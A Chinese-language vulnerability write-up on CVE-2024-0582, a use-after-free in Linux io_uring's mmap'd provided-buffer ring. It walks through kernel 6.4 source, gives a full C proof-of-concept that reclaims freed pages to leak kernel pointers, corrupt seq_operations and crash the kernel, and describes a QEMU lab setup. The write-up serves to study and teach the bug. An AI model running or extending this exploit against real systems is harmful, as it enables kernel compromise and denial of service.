CVE-2024-0582 是发生在 Linux Kernel 的 io_uring 这一个高性能异步 IO API 中的漏洞,得益于对使用 IORING_REGISTER_PBUF_RING 注册的 ring buffer 在 mmap() 映射的情况下存在可以在释放后仍被使用的 UAF 漏洞,攻击者可以通过该漏洞攻击内核并完成内核提权;该漏洞的 CVSS 分数为 7.8,影响版本包括但不限于 6.4~6.6.5,本文我们选用 6.4 的版本内核源码进行分析。
漏洞分析 PBUF_RING Internal 我们这里主要关注 io_uring_register 函数中 switch 中与 PBUF_RING 相关的部分
注册:IORING_REGISTER_PBUF_RING 对于这个漏洞我们主要关注当 opcode == IORING_REGISTER_PBUF_RING 的情况,该 opcode 意味着注册一个环形缓冲区,其最终会调用到 io_register_pbuf_ring() 函数:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 int io_register_pbuf_ring (struct io_ring_ctx *ctx, void __user *arg) { struct io_uring_buf_reg reg ; struct io_buffer_list *bl , *free_bl = NULL ; int ret; if (copy_from_user(®, arg, sizeof (reg))) return -EFAULT; if (reg.resv[0 ] || reg.resv[1 ] || reg.resv[2 ]) return -EINVAL; if (reg.flags & ~IOU_PBUF_RING_MMAP) return -EINVAL; if (!(reg.flags & IOU_PBUF_RING_MMAP)) { if (!reg.ring_addr) return -EFAULT; if (reg.ring_addr & ~PAGE_MASK) return -EINVAL; } else { if (reg.ring_addr) return -EINVAL; } if (!is_power_of_2(reg.ring_entries)) return -EINVAL; if (reg.ring_entries >= 65536 ) return -EINVAL; if (unlikely(reg.bgid < BGID_ARRAY && !ctx->io_bl)) { int ret = io_init_bl_list(ctx); if (ret) return ret; } bl = io_buffer_get_list(ctx, reg.bgid); if (bl) { if (bl->is_mapped || !list_empty(&bl->buf_list)) return -EEXIST; } else { free_bl = bl = kzalloc(sizeof (*bl), GFP_KERNEL); if (!bl) return -ENOMEM; } if (!(reg.flags & IOU_PBUF_RING_MMAP)) ret = io_pin_pbuf_ring(®, bl); else ret = io_alloc_pbuf_ring(®, bl); if (!ret) { bl->nr_entries = reg.ring_entries; bl->mask = reg.ring_entries - 1 ; io_buffer_add_list(ctx, bl, reg.bgid); return 0 ; } kfree(free_bl); return ret; }
关注存在 IOU_PBUF_RING_MMAP 标志时会调用 io_alloc_pbuf_ring 函数,由内核分配连续页面,否则调用 io_pin_pbuf_ring 函数将用户态页面 pin 到 ring 上,(当 io_buffer_get_list 获取到的 bl 为空时会调用到这里进行分配) IOU_PBUF_RING_MMAP 标志表示由内核分配环形缓冲区的内存,之后用户态应用使用 mmap() 映射来访问: 继续查看 io_alloc_pbuf_ring() 函数,可以看到调用 __get_free_pages 来分配页面,flag 为 GFP_KERNEL_ACCOUNT :
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 unsigned long __get_free_pages(gfp_t gfp_mask, unsigned int order){ struct page *page ; page = alloc_pages(gfp_mask & ~__GFP_HIGHMEM, order); if (!page) return 0 ; return (unsigned long ) page_address(page); } EXPORT_SYMBOL(__get_free_pages); static int io_alloc_pbuf_ring (struct io_uring_buf_reg *reg, struct io_buffer_list *bl) { gfp_t gfp = GFP_KERNEL_ACCOUNT | __GFP_ZERO | __GFP_NOWARN | __GFP_COMP; size_t ring_size; void *ptr; ring_size = reg->ring_entries * sizeof (struct io_uring_buf_ring); ptr = (void *) __get_free_pages(gfp, get_order(ring_size)); if (!ptr) return -ENOMEM; bl->buf_ring = ptr; bl->is_mapped = 1 ; bl->is_mmap = 1 ; return 0 ; }
分配的结构体为 io_uring_buf_ring ,其定义如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 struct io_uring_buf_ring { union { struct { __u64 resv1; __u32 resv2; __u16 resv3; __u16 tail; }; __DECLARE_FLEX_ARRAY(struct io_uring_buf, bufs); }; };
图示:
注销:IORING_UNREGISTER_PBUF_RING 注销 PBUF_RING 对应的操作为 IORING_UNREGISTER_PBUF_RING ,内核会调用到 io_unregister_pbuf_ring 进行处理
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 int io_unregister_pbuf_ring (struct io_ring_ctx *ctx, void __user *arg) { struct io_uring_buf_reg reg ; struct io_buffer_list *bl ; if (copy_from_user(®, arg, sizeof (reg))) return -EFAULT; if (reg.resv[0 ] || reg.resv[1 ] || reg.resv[2 ]) return -EINVAL; if (reg.flags) return -EINVAL; bl = io_buffer_get_list(ctx, reg.bgid); if (!bl) return -ENOENT; if (!bl->is_mapped) return -EINVAL; __io_remove_buffers(ctx, bl, -1U ); if (bl->bgid >= BGID_ARRAY) { xa_erase(&ctx->io_bl_xa, bl->bgid); kfree(bl); } return 0 ; }
通过 __io_remove_buffers 函数来释放 bl ,然后使用 xa_erase 函数移除该 io_buffer_list 并释放。 __io_remove_buffers 函数定义如下,由于在 alloc 时制定了 is_mapped = 1; is_mmap=1,因此会走以下路径:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 static int __io_remove_buffers(struct io_ring_ctx *ctx, struct io_buffer_list *bl, unsigned nbufs) { unsigned i = 0 ; if (!nbufs) return 0 ; if (bl->is_mapped) { i = bl->buf_ring->tail - bl->head; if (bl->is_mmap) { struct page *page ; page = virt_to_head_page(bl->buf_ring); if (put_page_testzero(page)) free_compound_page(page); bl->buf_ring = NULL ; bl->is_mmap = 0 ; } else if { ... } INIT_LIST_HEAD(&bl->buf_list); bl->is_mapped = 0 ; return i; } ... }
使用:io_uring_mmap 可以通过 mmap() 对 io_uring 的 fd 进行映射,内核最终会调用到 io_uring_mmap() 函数:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 static __cold int io_uring_mmap (struct file *file, struct vm_area_struct *vma) { size_t sz = vma->vm_end - vma->vm_start; unsigned long pfn; void *ptr; ptr = io_uring_validate_mmap_request(file, vma->vm_pgoff, sz); if (IS_ERR(ptr)) return PTR_ERR(ptr); pfn = virt_to_phys(ptr) >> PAGE_SHIFT; return remap_pfn_range(vma, vma->vm_start, pfn, sz, vma->vm_page_prot); } static const struct file_operations io_uring_fops = { .release = io_uring_release, .mmap = io_uring_mmap,
继续查看 io_uring_validate_mmap_request 函数内容,可以发现在对 pbuf 的获取指针是 ctx 的 bl:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 void *io_pbuf_get_address (struct io_ring_ctx *ctx, unsigned long bgid) { struct io_buffer_list *bl ; bl = io_buffer_get_list(ctx, bgid); if (!bl || !bl->is_mmap) return NULL ; return bl->buf_ring; } static void *io_uring_validate_mmap_request (struct file *file, loff_t pgoff, size_t sz) { struct io_ring_ctx *ctx = file->private_data; loff_t offset = pgoff << PAGE_SHIFT; struct page *page ; void *ptr; switch (offset & IORING_OFF_MMAP_MASK) { case IORING_OFF_SQ_RING: case IORING_OFF_CQ_RING: ptr = ctx->rings; break ; case IORING_OFF_SQES: ptr = ctx->sq_sqes; break ; case IORING_OFF_PBUF_RING: { unsigned int bgid; bgid = (offset & ~IORING_OFF_MMAP_MASK) >> IORING_OFF_PBUF_SHIFT; mutex_lock(&ctx->uring_lock); ptr = io_pbuf_get_address(ctx, bgid); mutex_unlock(&ctx->uring_lock); if (!ptr) return ERR_PTR(-EINVAL); break ; } default : return ERR_PTR(-EINVAL); } page = virt_to_head_page(ptr); if (sz > page_size(page)) return ERR_PTR(-EINVAL); return ptr; }
漏洞成因 当我们将 bl->buf_ring 的内存通过 mmap() 映射出去后,仍然可以通过 io_unregister_pbuf_ring 函数将这块内存释放掉,因此可以先进行内存分配,再 mmap,最后再释放这块内存就直接有一个 UAF:可以通过 mmap 的内存区域直接读写释放掉的内存页。
POC 这里直接 copy 了 a3 的 poc:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <stdint.h> #include <unistd.h> #include <fcntl.h> #include <string.h> #include <sched.h> #include <liburing.h> #include <sys/mman.h> #include <sys/user.h> #ifndef IS_ERR #define IS_ERR(ptr) ((uintptr_t) ptr >= (uintptr_t) -4095UL) #endif #ifndef PTR_ERR #define PTR_ERR(ptr) ((int) (intptr_t) ptr) #endif #define SUCCESSS_MSG(msg) "\033[32m\033[1m" msg "\033[0m" #define INFO_MSG(msg) "\033[34m\033[1m" msg "\033[0m" #define ERR_MSG(msg) "\033[31m\033[1m" msg "\033[0m" void bind_core (int core) { cpu_set_t cpu_set; CPU_ZERO(&cpu_set); CPU_SET(core, &cpu_set); sched_setaffinity(getpid(), sizeof (cpu_set), &cpu_set); printf (INFO_MSG("[*] Process binded to core: " ) "%d\n" , core); } struct io_uring_buf_ring*setup_pbuf_ring_mmap (struct io_uring *ring, unsigned int ring_entries, int bgid, unsigned int flags, int *retp) { struct io_uring_buf_ring *buf_ring ; struct io_uring_buf_reg buf_reg ; size_t ring_size; off_t offset; int ret; memset (&buf_reg, 0 , sizeof (buf_reg)); buf_reg.ring_entries = ring_entries; buf_reg.bgid = bgid; buf_reg.flags = IOU_PBUF_RING_MMAP; ret = io_uring_register_buf_ring(ring, &buf_reg, flags); if (ret) { puts (ERR_MSG("[x] Error occur while doing io_uring_register_buf_ring" )); *retp = ret; return NULL ; } offset = IORING_OFF_PBUF_RING | (uint64_t ) bgid << IORING_OFF_PBUF_SHIFT; ring_size = ring_entries * sizeof (struct io_uring_buf); buf_ring = mmap( NULL , ring_size, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE, ring->ring_fd, offset ); if (IS_ERR(buf_ring)) { puts (ERR_MSG("[x] Error occur while doing mmap() for io_uring" )); *retp = PTR_ERR(buf_ring); return NULL ; } *retp = 0 ; return buf_ring; } #define NR_PAGES 1 #define NR_BUFFERS 0x100 #define SEQ_FILE_NR 0x200 void proof_of_concept (void ) { struct io_uring ring ; void **buffers; int seq_fd[SEQ_FILE_NR], found = 0 ; int ret; puts (SUCCESSS_MSG("-------- CVE-2024-0582 Proof-of-concet --------" )); puts (INFO_MSG("-------\t\t Author: " ) "arttnba3" INFO_MSG(" \t-------" )); puts (SUCCESSS_MSG("-----------------------------------------------\n" )); puts ("[*] Preparing..." ); bind_core(0 ); if (io_uring_queue_init(4 , &ring, 0 ) < 0 ) { perror(ERR_MSG("[x] Unable to init for io_uring queue" )); exit (EXIT_FAILURE); } puts ("[*] Allocating pbuf ring and doing mmap()..." ); buffers = calloc (NR_BUFFERS, sizeof (void *)); for (int i = 0 ; i < NR_BUFFERS; i++) { buffers[i] = setup_pbuf_ring_mmap( &ring, NR_PAGES * PAGE_SIZE / sizeof (struct io_uring_buf), i, 0 , &ret ); if (ret) { printf ( ERR_MSG("[x] Unable to set up" ) " No.%d " ERR_MSG("pbuf ring, error code: " ) "%d\n" , i, ret ); exit (EXIT_FAILURE); } io_uring_buf_ring_init(buffers[i]); } puts ("[*] Triggering page-level UAF vulnerabilities..." ); for (int i = 0 ; i < NR_BUFFERS; i++) { ret = io_uring_unregister_buf_ring(&ring, i); if (ret) { printf ( ERR_MSG("[x] Unable to unregister" ) " No.%d " ERR_MSG("pbuf ring, error code: " ) "%d\n" , i, ret ); exit (EXIT_FAILURE); } } puts ("[*] Reallocating page into seq_file::seq_operations..." ); for (int i = 0 ; i < SEQ_FILE_NR; i++) { if ((seq_fd[i] = open("/proc/self/stat" , O_RDONLY)) < 0 ) { printf ( ERR_MSG("[x] Unable to open" ) " No.%d " ERR_MSG("seq file, error code: " ) "%d\n" , i, seq_fd[i] ); exit (EXIT_FAILURE); } } puts ("[*] Checking data leak and overwriting..." ); for (int i = 0 ; i < NR_BUFFERS; i++) { uint64_t *buffer = buffers[i]; for (int j = 0 ; j < (NR_PAGES * PAGE_SIZE / sizeof (uint64_t )); j++) { if (buffer[j]>0xffffffff80000000 && buffer[j]<0xfffffffff0000000 ) { printf ( SUCCESSS_MSG("[+] Got kernel data leak:" ) " %lx " SUCCESSS_MSG("at location " ) "%d-%d\n" , buffer[j], i, j ); buffer[j] = *(uint64_t *) "arttnba3" ; found = 1 ; goto out; } } } if (!found) { puts (ERR_MSG("[x] Failed to reallocate UAF page as seq_operations!" )); exit (EXIT_FAILURE); } out: puts ("[*] Triggering kernel panic..." ); sleep(1 ); for (int i = 0 ; i < SEQ_FILE_NR; i++) { char buf[0x1000 ]; read(seq_fd[i], buf, 1 ); } puts ("[?] So you're still alive here!?" ); system("/bin/sh" ); } int main (int argc, char **argv, char **envp) { proof_of_concept(); return 0 ; }
漏洞复现 这里我们选择 linux-6.4.16 内核源码进行编译
1 2 3 4 5 6 wget https://mirrors.tuna.tsinghua.edu.cn/kernel/v6.x/linux-6.4.16.tar.xz unxz linux-6.4.16.tar.xz # choose config, all default is good make menuconfig
有一个证书功能的报错:https://blog.csdn.net/m0_47696151/article/details/121574718 另外 gcc 版本不要太新(arch 复现环境的痛 XD,在服务器上 gcc 11.1 可以成功编译)
使用 busybox 来搭建基本文件系统
1 2 3 4 5 6 7 8 wget https://busybox.net/downloads/busybox-1.36.0.tar.bz2 tar -jxvf busybox-1.36.0.tar.bz2 # `Settings` ---> `Build static binary file (no shared lib)` to compile static busybox # 可选项:在 Linux System Utilities 中取消选中 Support mounting NFS file systems on Linux <2.6.23 (NEW);在 Networking Utilities 中取消选中 inetd。 make menuconfig make -j$(nproc) make install
配置文件系统,在编译生成的 _install 目录下创建基本的文件系统结构
配置文件系统 ¶ 我们首先在 _install 目录下创建基本的文件系统结构:
1 2 3 4 5 6 cd _install mkdir -pv {bin,sbin,etc,proc,sys,dev,home/ctf,root,tmp,lib64,lib/x86_64-linux-gnu,usr/{bin,sbin}} touch etc/inittab mkdir etc/init.d touch etc/init.d/rcS chmod +x ./etc/init.d/rcS
在我们创建的 ./etc/inittab 中写入如下内容:
1 2 3 4 5 6 ::sysinit:/etc/init.d/rcS ::askfirst:/bin/login ::ctrlaltdel:/sbin/reboot ::shutdown:/sbin/swapoff -a ::shutdown:/bin/umount -a -r ::restart:/sbin/init
在上面的文件中指定了系统初始化脚本为 etc/init.d/rcS,因此接下来我们配置这个文件写入如下内容,主要是挂载各种文件系统,以及设置各目录的权限,并创建一个非特权用户:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 # !/bin/sh chown -R root:root / chmod 700 /root chown -R ctf:ctf /home/ctf mount -t proc none /proc mount -t sysfs none /sys mount -t tmpfs tmpfs /tmp mkdir /dev/pts mount -t devpts devpts /dev/pts echo 1 > /proc/sys/kernel/dmesg_restrict echo 1 > /proc/sys/kernel/kptr_restrict echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n" cd /home/ctf su ctf -c sh poweroff -d 0 -f
`
然后为这个脚本添加可执行权限,该脚本通常用作我们自定义的环境初始化脚本:chmod +x ./etc/init.d/rcS
接下来我们配置用户组相关权限,在这里建立了两个用户组 root 和 ctf ,以及两个用户 root 和 ctf,并配置了一条文件系统挂载项:
1 2 3 4 5 echo "root:x:0:0:root:/root:/bin/sh" > etc/passwd echo "ctf:x:1000:1000:ctf:/home/ctf:/bin/sh" >> etc/passwd echo "root:x:0:" > etc/group echo "ctf:x:1000:" >> etc/group echo "none /dev/pts devpts gid=5,mode=620 0 0" > etc/fstab`
打包文件系统 按 cpio 格式打包即可,最后设置启动脚本如下:
1 2 3 4 5 6 7 8 9 10 11 12 # !/bin/sh qemu-system-x86_64 \ -m 128M \ -kernel ./bzImage \ -initrd ./rootfs.cpio \ -monitor /dev/null \ -append "root=/dev/ram rdinit=/sbin/init console=ttyS0 oops=panic panic=1 loglevel=3 quiet kaslr" \ -cpu kvm64,+smep \ -smp cores=2,threads=1 \ -nographic \ -snapshot \ -s
参考链接